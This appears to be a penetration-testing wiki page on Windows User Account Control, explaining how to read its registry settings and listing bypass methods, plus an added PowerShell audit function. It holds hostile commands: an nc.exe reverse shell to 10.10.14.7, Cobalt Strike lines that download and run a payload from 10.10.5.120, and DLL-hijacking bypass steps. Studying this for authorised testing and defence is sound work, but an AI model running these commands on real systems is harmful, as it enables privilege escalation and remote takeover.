# UAC - User Account Control
### UAC Bypass Theory

Some programs are **autoelevated automatically** if the **user belongs** to the **administrator group**. These binaries have inside their _**Manifests**_ the _**autoElevate**_ option with value _**True**_. The binary also has to be **signed by Microsoft**.

Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to high**) some attackers use this kind of binaries to **execute arbitrary code**, because it will be executed from a **high integrity level process**.

You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (from Sysinternals).

### Check UAC

To confirm if UAC is enabled do:

```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    EnableLUA    REG_DWORD    0x1
```

If it's **`1`** then UAC is **activated**; if it's **`0`** or it **doesn't exist**, then UAC is **inactive**.

Then, check **which level** is configured:

```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5
```

* If **`0`**, UAC won't prompt (like **disabled**)
* If **`1`**, the admin is **asked for username and password** to execute the binary with high rights (on the Secure Desktop)
* If **`2`** (**Always notify me**), UAC will always ask the administrator for confirmation when he tries to execute something with high privileges (on the Secure Desktop)
* If **`3`**, like `1` but not necessarily on the Secure Desktop
* If **`4`**, like `2` but not necessarily on the Secure Desktop
* If **`5`** (**default**), it will ask the administrator to confirm running non-Windows binaries with high privileges

Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
If the value is **`0`**, then only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if it's `1`, **all accounts inside the "Administrators"** group can do them.

And, finally, take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`** (default), the **built-in Administrator account can** do remote administration tasks, and if **`1`** the built-in Administrator account **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
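As an added example (not part of the original page), the following PowerShell function reads the four values discussed above from the policy key and reports the effective UAC posture, applying the same rules this page describes. Treating a missing `ConsentPromptBehaviorAdmin` as `5` is an assumption; the function name `Get-UacPosture` is ours.

```powershell
# Added example: audit the UAC-related policy values described above and
# print the effective posture. Not code from the original page.
$PolicyKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacPosture {
    param([string]$Key = $PolicyKey)
    $p = Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue

    # Missing values: EnableLUA missing means UAC off (per the page); the other
    # defaults (consent 5, both filter values 0) are assumptions.
    $enableLua   = if ($null -ne $p.EnableLUA) { [int]$p.EnableLUA } else { 0 }
    $consent     = if ($null -ne $p.ConsentPromptBehaviorAdmin) { [int]$p.ConsentPromptBehaviorAdmin } else { 5 }
    $tokenFilter = if ($null -ne $p.LocalAccountTokenFilterPolicy) { [int]$p.LocalAccountTokenFilterPolicy } else { 0 }
    $filterAdmin = if ($null -ne $p.FilterAdministratorToken) { [int]$p.FilterAdministratorToken } else { 0 }

    # Meaning of ConsentPromptBehaviorAdmin, as listed above.
    $consentText = switch ($consent) {
        0 { 'No prompt (effectively disabled)' }
        1 { 'Prompt for credentials on the Secure Desktop' }
        2 { 'Always notify: prompt for consent on the Secure Desktop' }
        3 { 'Prompt for credentials, not on the Secure Desktop' }
        4 { 'Prompt for consent, not on the Secure Desktop' }
        5 { 'Prompt for consent for non-Windows binaries (default)' }
        default { "Unknown value $consent" }
    }

    # Decision table from the page's summary of EnableLUA /
    # LocalAccountTokenFilterPolicy / FilterAdministratorToken.
    $verdict = if ($enableLua -eq 0) {
        'No UAC for anyone (EnableLUA=0 or missing)'
    } elseif ($tokenFilter -eq 1) {
        'No UAC for anyone (LocalAccountTokenFilterPolicy=1)'
    } elseif ($filterAdmin -eq 0) {
        'No UAC for RID 500 (built-in Administrator) only'
    } else {
        'UAC for everyone'
    }

    [pscustomobject]@{
        EnableLUA                     = $enableLua
        ConsentPromptBehaviorAdmin    = "$consent ($consentText)"
        LocalAccountTokenFilterPolicy = $tokenFilter
        FilterAdministratorToken      = $filterAdmin
        HighestSecurityLevel          = ($consent -eq 2)   # 'Always notify'
        Verdict                       = $verdict
    }
}

Get-UacPosture | Format-List
```

Run it from any PowerShell session (reading this key does not require elevation); `HighestSecurityLevel` flags the "Always notify" setting that the page notes is much harder to bypass.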
#### Summary

* If `EnableLUA=0` or it **doesn't exist**, **no UAC for anyone**
* If `EnableLUA=1` and **`LocalAccountTokenFilterPolicy=1`, no UAC for anyone**
* If `EnableLUA=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, no UAC for RID 500 (built-in Administrator)**
* If `EnableLUA=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**

All this information can be gathered using the **metasploit** module: `post/windows/gather/win_privs`

You can also check the groups of your user and get the integrity level:

```
net user %username%
whoami /groups | findstr Level
```

## UAC bypass

{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straightforward, as you can simply click on "Yes" when the UAC prompt appears
{% endhint %}

The UAC bypass is needed in the following situation: **the UAC is activated, your process is running in a medium integrity context, and your user belongs to the administrators group**.

It is important to mention that it is **much harder to bypass the UAC if it is in the highest security level (Always) than if it is in any of the other levels (Default).**

### UAC disabled

If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:

```bash
#Put your reverse shell instead of "calc.exe"
Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```

#### UAC bypass with token duplication

* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)

### **Very** Basic UAC "bypass" (full file system access)

If you have a shell with a user that is inside the Administrators group you can **mount the C$** share via SMB (file system) locally as a new disk and you will have **access to everything inside the file system** (even the Administrator home folder).

{% hint style="warning" %}
**Looks like this trick isn't working anymore**
{% endhint %}

```bash
net use Z: \\127.0.0.1\c$
cd C$
#Or you could just access it:
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```

### UAC bypass with cobalt strike

The Cobalt Strike techniques will only work if UAC is not set at its max security level

```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]

# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```

**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.

### UAC bypass exploits

[**UACME**](https://github.com/hfiref0x/UACME) is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using Visual Studio or msbuild**. The compilation will create several executables (like `Source\Akagi\output\x64\Debug\Akagi.exe`), so you will need to know **which one you need.**\
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.

UACME lists the **build version from which each technique started working**. You can search for a technique affecting your version:

```
PS C:\> [environment]::OSVersion.Version

Major  Minor  Build  Revision
-----  -----  -----  --------
10     0      14393  0
```

Also, using [this](https://en.wikipedia.org/wiki/Windows\_10\_version\_history) page you can get the Windows release (`1607`) from the build version.

#### More UAC bypass

**All** the techniques used here to bypass UAC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).

You can get one using a **meterpreter** session. Migrate to a **process** that has the **Session** value equal to **1**:

![](<../../.gitbook/assets/image (96).png>)

(_explorer.exe_ should work)

### Your own bypass - Basic UAC bypass methodology

If you take a look at **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerability** (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](../windows-local-privilege-escalation/dll-hijacking.md).

1. Find a binary that will **autoelevate** (check that when it is executed it runs in a high integrity level).
2. With procmon find "**NAME NOT FOUND**" events that can be vulnerable to **DLL Hijacking**.
3. You probably will need to **write** the DLL inside some **protected paths** (like C:\Windows\System32) where you don't have write permissions. You can bypass this using:
   1. **wusa.exe**: Windows 7, 8 and 8.1. It allows extracting the content of a CAB file inside protected paths (because this tool is executed from a high integrity level).
   2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.

### Another UAC bypass technique

Consists in watching whether an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches for this information inside **HKCU**).

![](<../../.gitbook/assets/image (9) (1) (2).png>)